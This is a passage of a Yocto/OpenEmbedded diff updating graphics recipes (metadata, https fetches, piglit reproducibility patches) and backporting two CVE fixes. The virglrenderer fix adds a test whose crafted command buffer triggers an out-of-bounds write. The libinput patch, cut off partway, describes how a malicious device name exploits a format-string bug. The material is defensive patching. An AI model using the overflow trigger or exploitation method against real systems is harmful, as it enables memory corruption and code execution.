--- a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
+++ b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Very simple session manager for X"
+DESCRIPTION = "Simple session manager for X, that provides just the right boilerplate to create a session and launch the browser "
HOMEPAGE = "http://www.yoctoproject.org"
BUGTRACKER = "http://bugzilla.pokylinux.org"
diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe..88101b5dcc 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
# Exclude x.99.x versions from upstream checks
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
-SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \
+SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
file://fix-test-includes.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/mx/mx.inc b/meta/recipes-graphics/mx/mx.inc
index 714a06f0af..c977849c96 100644
--- a/meta/recipes-graphics/mx/mx.inc
+++ b/meta/recipes-graphics/mx/mx.inc
@@ -1,4 +1,10 @@
SUMMARY = "Clutter based UI widget library"
+DESCRIPTION = "Mx is a widget toolkit using Clutter that provides a set of standard interface \
+elements, including buttons, progress bars, scroll bars and others. It also \
+implements some standard managers. One other interesting feature is the \
+possibility of setting style properties from a CSS format file."
+HOMEPAGE = "https://github.com/clutter-project/mx"
+BUGTRACKER = "https://github.com/clutter-project/mx/issues"
LICENSE = "LGPLv2.1"
inherit clutter autotools features_check gobject-introspection gtk-doc
diff --git a/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
new file mode 100644
index 0000000000..caa48e088d
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
@@ -0,0 +1,27 @@
+From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Sun, 1 Nov 2020 20:08:49 +0000
+Subject: [PATCH] Add a missing include for htobe32 definition
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+index 5f45e0c23..c755ee29a 100644
+--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+@@ -34,6 +34,8 @@
+
+ #include "piglit-util-gl.h"
+
++#include <endian.h>
++
+ #define IMAGE_WIDTH 60
+ #define IMAGE_HEIGHT 60
+
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
new file mode 100644
index 0000000000..cc9482c047
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
@@ -0,0 +1,31 @@
+From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 30 Nov 2020 23:08:22 +0000
+Subject: [PATCH] framework/profile.py: make test lists reproducible
+
+These are created with os.walk, which yields different
+order depending on where it's run.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ framework/profile.py | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/framework/profile.py b/framework/profile.py
+index c210e535e..9b5d51d68 100644
+--- a/framework/profile.py
++++ b/framework/profile.py
+@@ -528,7 +528,11 @@ class TestProfile(object):
+ else:
+ opts[n] = self.test_list[n]
+ else:
+- opts = self.test_list # pylint: disable=redefined-variable-type
++ opts = collections.OrderedDict()
++ test_keys = list(self.test_list.keys())
++ test_keys.sort()
++ for k in test_keys:
++ opts[k] = self.test_list[k]
+
+ for k, v in self.filters.run(opts.items()):
+ yield k, v
diff --git a/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
new file mode 100644
index 0000000000..8704f98500
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
@@ -0,0 +1,44 @@
+From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:12:32 +0000
+Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
+ hardcode the full binary path
+
+This helps reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ generated_tests/gen_tcs_input_tests.py | 2 +-
+ generated_tests/gen_tes_input_tests.py | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
+index face4f19a..e36671af4 100644
+--- a/generated_tests/gen_tcs_input_tests.py
++++ b/generated_tests/gen_tcs_input_tests.py
+@@ -272,7 +272,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
+index 3d847b5cc..954840b20 100644
+--- a/generated_tests/gen_tes_input_tests.py
++++ b/generated_tests/gen_tes_input_tests.py
+@@ -301,7 +301,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
new file mode 100644
index 0000000000..2efba6f866
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
+From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 16 Nov 2020 18:01:02 +0000
+Subject: [PATCH] serializer.py: make .gz files reproducible
+
+.gz format contains mtime of the compressed data, and
+SOURCE_DATE_EPOCH is the standard way to make it reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/serializer.py | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tests/serializer.py b/tests/serializer.py
+index bd14bc3db..bc5b45d7f 100644
+--- a/tests/serializer.py
++++ b/tests/serializer.py
+@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
+ et.SubElement(env, 'env', name=k, value=v)
+
+ tree = et.ElementTree(root)
+- with gzip.open(outfile, 'wb') as f:
++ reproducible_mtime = None
++ if 'SOURCE_DATE_EPOCH' in os.environ:
++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
+ tree.write(f, encoding='utf-8', xml_declaration=True)
+
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
new file mode 100644
index 0000000000..8321be8490
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
@@ -0,0 +1,28 @@
+From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Wed, 2 Dec 2020 21:21:52 +0000
+Subject: [PATCH] tests/shader.py: sort the file list before working on it
+
+This allows later xml output to be reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/shader.py | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/tests/shader.py b/tests/shader.py
+index 849273660..e6e65d1ba 100644
+--- a/tests/shader.py
++++ b/tests/shader.py
+@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
+ for group, files in shader_tests.items():
+ assert group not in profile.test_list, 'duplicate group: {}'.format(group)
+
+- # We'll end up with a list of tuples, split that into two lists
++ # This makes the xml output reproducible, as os.walk() order is random
++ files.sort()
++ # We'll end up with a list of tuples, split that into two list
+ files, installedfiles = list(zip(*files))
+ files = list(files)
+ installedfiles = list(installedfiles)
diff --git a/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
new file mode 100644
index 0000000000..16c7c5c803
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
@@ -0,0 +1,30 @@
+From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:13:50 +0000
+Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
+ into target binary
+
+This helps reproducibility.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/util/piglit-shader.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
+index 4fd68d21e..c9ea8295e 100644
+--- a/tests/util/piglit-shader.c
++++ b/tests/util/piglit-shader.c
+@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
+
+ source_dir = getenv("PIGLIT_SOURCE_DIR");
+ if (source_dir == NULL) {
+- source_dir = SOURCE_DIR;
++ source_dir = ".";
+ }
+
+ snprintf(filename_with_path, FILENAME_MAX - 1,
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 58d10d6b9b..9897ef1575 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -1,16 +1,24 @@
SUMMARY = "OpenGL driver testing framework"
DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \
implementations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/piglit"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
-SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \
file://0001-cmake-install-bash-completions-in-the-right-place.patch \
file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
+ file://0001-Add-a-missing-include-for-htobe32-definition.patch \
+ file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \
+ file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \
+ file://0001-serializer.py-make-.gz-files-reproducible.patch \
+ file://0001-framework-profile.py-make-test-lists-reproducible.patch \
+ file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \
"
UPSTREAM_CHECK_COMMITS = "1"
-SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813"
+SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985"
# (when PV goes above 1.0 remove the trailing r)
PV = "1.0+gitr${SRCPV}"
@@ -35,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/"
PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}"
PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut,"
PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}"
+PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader"
+export PIGLIT_BUILD_DIR = "../../../../git"
do_configure_prepend() {
if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then
diff --git a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
index d10bddb529..f69e4838f4 100644
--- a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
+++ b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
@@ -1,6 +1,9 @@
SUMMARY = "Enables monitoring and display of application startup"
+DESCRIPTION = "Contains a reference implementation of the startup notification protocol. \
+The reference implementation is mostly under an X Window System style license, and has \
+no special dependencies. "
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/"
-BUGTRACKER = "https://bugs.freedesktop.org/enter_bug.cgi?product=Specifications"
+BUGTRACKER = "https://gitlab.freedesktop.org/xdg/startup-notification/-/issues"
# most files are under MIT, but libsn/sn-util.c is under LGPL, the
# effective license is LGPL
diff --git a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
index 3e1ba196b5..b75bd4c51d 100644
--- a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
+++ b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "The Bitstream Vera fonts - TTF Edition"
+HOMEPAGE = "https://www.gnome.org/fonts/"
DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \
faces (normal, oblique, bold, bold oblique) and two serif faces (normal \
and bold). In addition Fontconfig/Xft2 can artificially oblique the \
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
new file mode 100644
index 0000000000..4a277bd4d0
--- /dev/null
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
@@ -0,0 +1,100 @@
+From 95e581fd181b213c2ed7cdc63f2abc03eaaa77ec Mon Sep 17 00:00:00 2001
+From: Gert Wollny <gert.wollny@collabora.com>
+Date: Tue, 30 Nov 2021 10:17:26 +0100
+Subject: [PATCH] vrend: Add test to resource OOB write and fix it
+
+v2: Also check that no depth != 1 has been sent when none is due
+
+Closes: #250
+Signed-off-by: Gert Wollny <gert.wollny@collabora.com>
+Reviewed-by: Chia-I Wu <olvaffe@gmail.com>
+
+https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/95e581fd181b213c2ed7cdc63f2abc03eaaa77ec
+Upstream-Status: Backport
+CVE: CVE-2022-0135
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/vrend_renderer.c | 3 +++
+ tests/test_fuzzer_formats.c | 43 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 46 insertions(+)
+
+diff --git a/src/vrend_renderer.c b/src/vrend_renderer.c
+index 28f669727..357b81b20 100644
+--- a/src/vrend_renderer.c
++++ b/src/vrend_renderer.c
+@@ -7833,8 +7833,11 @@ static int vrend_renderer_transfer_write_iov(struct vrend_context *ctx,
+ info->box->height) * elsize;
+ if (res->target == GL_TEXTURE_3D ||
+ res->target == GL_TEXTURE_2D_ARRAY ||
++ res->target == GL_TEXTURE_2D_MULTISAMPLE_ARRAY ||
+ res->target == GL_TEXTURE_CUBE_MAP_ARRAY)
+ send_size *= info->box->depth;
++ else if (need_temp && info->box->depth != 1)
++ return EINVAL;
+
+ if (need_temp) {
+ data = malloc(send_size);
+diff --git a/tests/test_fuzzer_formats.c b/tests/test_fuzzer_formats.c
+index 59d6fb671..2de9a9a3f 100644
+--- a/tests/test_fuzzer_formats.c
++++ b/tests/test_fuzzer_formats.c
+@@ -957,6 +957,48 @@ static void test_vrend_set_signle_abo_heap_overflow() {
+ virgl_renderer_submit_cmd((void *) cmd, ctx_id, 0xde);
+ }
+
++/* Test adapted from yaojun8558363@gmail.com:
++ * https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/250
++*/
++static void test_vrend_3d_resource_overflow() {
++
++ struct virgl_renderer_resource_create_args resource;
++ resource.handle = 0x4c474572;
++ resource.target = PIPE_TEXTURE_2D_ARRAY;
++ resource.format = VIRGL_FORMAT_Z24X8_UNORM;
++ resource.nr_samples = 2;
++ resource.last_level = 0;
++ resource.array_size = 3;
++ resource.bind = VIRGL_BIND_SAMPLER_VIEW;
++ resource.depth = 1;
++ resource.width = 8;
++ resource.height = 4;
++ resource.flags = 0;
++
++ virgl_renderer_resource_create(&resource, NULL, 0);
++ virgl_renderer_ctx_attach_resource(ctx_id, resource.handle);
++
++ uint32_t size = 0x400;
++ uint32_t cmd[size];
++ int i = 0;
++ cmd[i++] = (size - 1) << 16 | 0 << 8 | VIRGL_CCMD_RESOURCE_INLINE_WRITE;
++ cmd[i++] = resource.handle;
++ cmd[i++] = 0; // level
++ cmd[i++] = 0; // usage
++ cmd[i++] = 0; // stride
++ cmd[i++] = 0; // layer_stride
++ cmd[i++] = 0; // x
++ cmd[i++] = 0; // y
++ cmd[i++] = 0; // z
++ cmd[i++] = 8; // w
++ cmd[i++] = 4; // h
++ cmd[i++] = 3; // d
++ memset(&cmd[i], 0, size - i);
++
++ virgl_renderer_submit_cmd((void *) cmd, ctx_id, size);
++}
++
++
+ int main()
+ {
+ initialize_environment();
+@@ -979,6 +1021,7 @@ int main()
+ test_cs_nullpointer_deference();
+ test_vrend_set_signle_abo_heap_overflow();
+
++ test_vrend_3d_resource_overflow();
+
+ virgl_renderer_context_destroy(ctx_id);
+ virgl_renderer_cleanup(&cookie);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 1046b8504f..8185d6f7e8 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,9 +10,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
DEPENDS = "libdrm mesa libepoxy"
SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
-SRC_URI = "git://anongit.freedesktop.org/virglrenderer \
+SRC_URI = "git://anongit.freedesktop.org/git/virglrenderer;branch=master \
file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
file://0001-meson.build-use-python3-directly-for-python.patch \
+ file://CVE-2022-0135.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64d..0774f37e31 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
DEPENDS = "zlib"
-SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \
+SRC_URI = "git://github.com/assimp/assimp.git;nobranch=1;protocol=https \
file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
"
diff --git a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
index c94e768b52..b212814759 100644
--- a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \
SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf"
SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd"
-SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \
- git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \
- git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \
+SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \
+ git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \
+ git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \
file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \
"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
index 72c29a72a2..c58a801e03 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
@@ -1,11 +1,15 @@
SUMMARY = "Vulkan Header files and API registry"
+DESCRIPTION = "Vulkan is a 3D graphics and compute API providing cross-platform access \
+to modern GPUs with low overhead and targeting realtime graphics applications such as \
+games and interactive media. This package contains the development headers \
+for packages wanting to make use of Vulkan."
HOMEPAGE = "https://www.khronos.org/vulkan/"
BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers"
SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84"
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
index 504cf85a2b..c8352bf31d 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
index 2fd61c989a..ec65f11952 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
@@ -1,11 +1,12 @@
SUMMARY = "Vulkan Utilities and Tools"
+DESCRIPTION = "Assist development by enabling developers to verify their applications correct use of the Vulkan API."
HOMEPAGE = "https://www.khronos.org/vulkan/"
BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools"
SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
index a620295978..f0dc780ca1 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.0.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
@@ -1,13 +1,21 @@
-SUMMARY = "cross-platform C library to defer selection of GL API and of window system"
+SUMMARY = "A C library for selecting an OpenGL API and window system at runtime"
+DESCRIPTION = "A cross-platform C library that allows one to defer selection \
+of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
+enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
+Wayland with OpenGL ES2, and other window system / API combinations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
-SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz"
-SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7"
-SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7"
+SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2"
+SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942"
+SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb"
-UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html"
+S = "${WORKDIR}/${BPN}-v${PV}"
+
+UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases"
inherit meson features_check lib_package bash-completion
diff --git a/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
new file mode 100644
index 0000000000..313c0c5eb2
--- /dev/null
+++ b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
@@ -0,0 +1,360 @@
+From 2a8b8fde90d63d48ce09ddae44142674bbca1c28 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Mar 2022 09:25:22 +1000
+Subject: [PATCH] evdev: strip the device name of format directives
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes a format string vulnerability.
+
+evdev_log_message() composes a format string consisting of a fixed
+prefix (including the rendered device name) and the passed-in format
+buffer. This format string is then passed with the arguments to the
+actual log handler, which usually and eventually ends up being printf.
+
+If the device name contains a printf-style format directive, these ended
+up in the format string and thus get interpreted correctly, e.g. for a
+device "Foo%sBar" the log message vs printf invocation ends up being:
+ evdev_log_message(device, "some message %s", "some argument");
+ printf("event9 - Foo%sBar: some message %s", "some argument");
+
+This can enable an attacker to execute malicious code with the
+privileges of the process using libinput.
+
+To exploit this, an attacker needs to be able to create a kernel device
+with a malicious name, e.g. through /dev/uinput or a Bluetooth device.
+
+To fix this, convert any potential format directives in the device name
+by duplicating percentages.
+
+Pre-rendering the device to avoid the issue altogether would be nicer
+but the current log level hooks do not easily allow for this. The device
+name is the only user-controlled part of the format string.
+
+A second potential issue is the sysname of the device which is also
+sanitized.
+
+This issue was found by Albin Eldstål-Ahrens and Benjamin Svensson from
+Assured AB, and independently by Lukas Lamster.
+
+Fixes #752
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+(cherry picked from commit a423d7d3269dc32a87384f79e29bb5ac021c83d1)
+
+CVE: CVE-2022-1215
+Upstream-Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ meson.build | 1 +
+ src/evdev.c | 31 +++++++++++------
+ src/evdev.h | 6 ++--
+ src/util-strings.h | 30 ++++++++++++++++
+ test/litest-device-format-string.c | 56 ++++++++++++++++++++++++++++++
+ test/litest.h | 1 +
+ test/test-utils.c | 26 ++++++++++++++
